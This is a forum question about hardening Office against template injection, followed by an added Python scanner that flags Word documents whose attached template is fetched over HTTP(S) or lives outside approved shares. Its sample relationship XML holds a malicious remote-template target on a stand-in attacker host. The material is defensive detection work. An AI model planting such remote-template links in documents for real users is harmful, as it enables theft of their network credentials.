Defending against template injection attacks?


I'm running Office 2016 on Windows 10, fully patched. Now working on hardening Office to make sure that users cannot make insecure decisions when they receive malicious files.
Template injection works pretty well and was used in the past in hacks. Using publicly available tools it's easy to get the attack working in under 10 minutes, stealing network credentials from users that open the file. However, I cannot find any technical mitigation technique... See e.g. https://attack.mitre.org/techniques/T1221/ for details.
Question: how to fix this issue? And in such a way that local SMB templates on shares (\\mycompany\documents\templates) *can* be opened and remote https shares (https://attacker.com/maliciousstuff) will be blocked.

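The policy the post asks for (templates on an approved internal share are fine, templates fetched over https are not) can at least be enforced at the gateway or endpoint by inspecting incoming documents before a user opens them. The script below is an added example, not part of the original post or of any Office setting: it reads the relationship part in which Word records an attached template (`word/_rels/settings.xml.rels`, a public part of the OOXML format) and classifies every external template target against an allow-list of UNC share prefixes. The share prefix, the hypothetical `corp.dotm` file name and the sample relationship XML are constructed for the demonstration; the remote URL is the one from the post.

```python
"""Flag Word documents whose attached template lives off the corporate network.

Added example, not from the original post.  Policy assumed here, matching the
post: UNC paths under an allow-listed share prefix are allowed, anything
fetched over http/https is blocked, everything else is left for review.
"""
import zipfile
from typing import List, NamedTuple
from urllib.parse import urlparse
import xml.etree.ElementTree as ET

# OOXML package part and identifiers (public parts of the Open XML format).
SETTINGS_RELS = "word/_rels/settings.xml.rels"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

# Constructed allow-list: the share prefix named in the post.
ALLOWED_SHARES = [r"\\mycompany\documents\templates"]


class Finding(NamedTuple):
    target: str   # template location exactly as written in the document
    verdict: str  # "allow", "block" or "review"
    reason: str


def classify_target(target: str, allowed_unc_prefixes: List[str]) -> Finding:
    """Apply the share-vs-internet policy to one external template target."""
    t = target.strip()
    scheme = urlparse(t).scheme.lower()
    # Templates pulled over HTTP(S) are exactly the case the post wants stopped.
    if scheme in ("http", "https"):
        return Finding(t, "block", "template fetched over %s" % scheme)
    # UNC paths: allow only when they sit under an approved share prefix.
    # The trailing backslash stops "\\server\templates-evil" matching "\\server\templates".
    if t.startswith("\\\\"):
        lowered = t.lower().replace("/", "\\")
        for prefix in allowed_unc_prefixes:
            if lowered.startswith(prefix.lower().rstrip("\\") + "\\"):
                return Finding(t, "allow", "UNC path under approved share")
        return Finding(t, "block", "UNC path outside approved shares")
    # Local paths or unusual forms: not the case in question, hand to a human.
    return Finding(t, "review", "unrecognised target form")


def scan_rels_xml(xml_text: str, allowed_unc_prefixes: List[str]) -> List[Finding]:
    """Return one Finding per *external* attachedTemplate relationship."""
    findings = []
    root = ET.fromstring(xml_text)
    for rel in root.iter("{%s}Relationship" % REL_NS):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        if rel.get("TargetMode", "Internal") != "External":
            continue  # template is embedded in the package; nothing is fetched
        findings.append(classify_target(rel.get("Target", ""), allowed_unc_prefixes))
    return findings


def scan_docx(path: str, allowed_unc_prefixes: List[str]) -> List[Finding]:
    """Open a .docx/.dotx/.docm package on disk and scan its settings part."""
    with zipfile.ZipFile(path) as z:
        if SETTINGS_RELS not in z.namelist():
            return []  # no settings relationships, hence no attached template
        return scan_rels_xml(z.read(SETTINGS_RELS).decode("utf-8"), allowed_unc_prefixes)


# Constructed sample relationship part (not taken from any real document):
# an approved-share template, an embedded one, and a remote https one.
SAMPLE_RELS = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="\\mycompany\documents\templates\corp.dotm" TargetMode="External"/>
  <Relationship Id="rId2"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="../templates/embedded.dotm"/>
  <Relationship Id="rId3"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="https://attacker.com/maliciousstuff" TargetMode="External"/>
</Relationships>
"""

if __name__ == "__main__":
    for f in scan_rels_xml(SAMPLE_RELS, ALLOWED_SHARES):
        print("%-6s %-45s %s" % (f.verdict, f.target, f.reason))
```

Run `scan_docx("incoming.docx", ALLOWED_SHARES)` from a mail-gateway or EDR hook and quarantine anything with a `block` verdict; the check is static (the zip is never opened by Word), so no template is fetched and no credentials are sent while scanning.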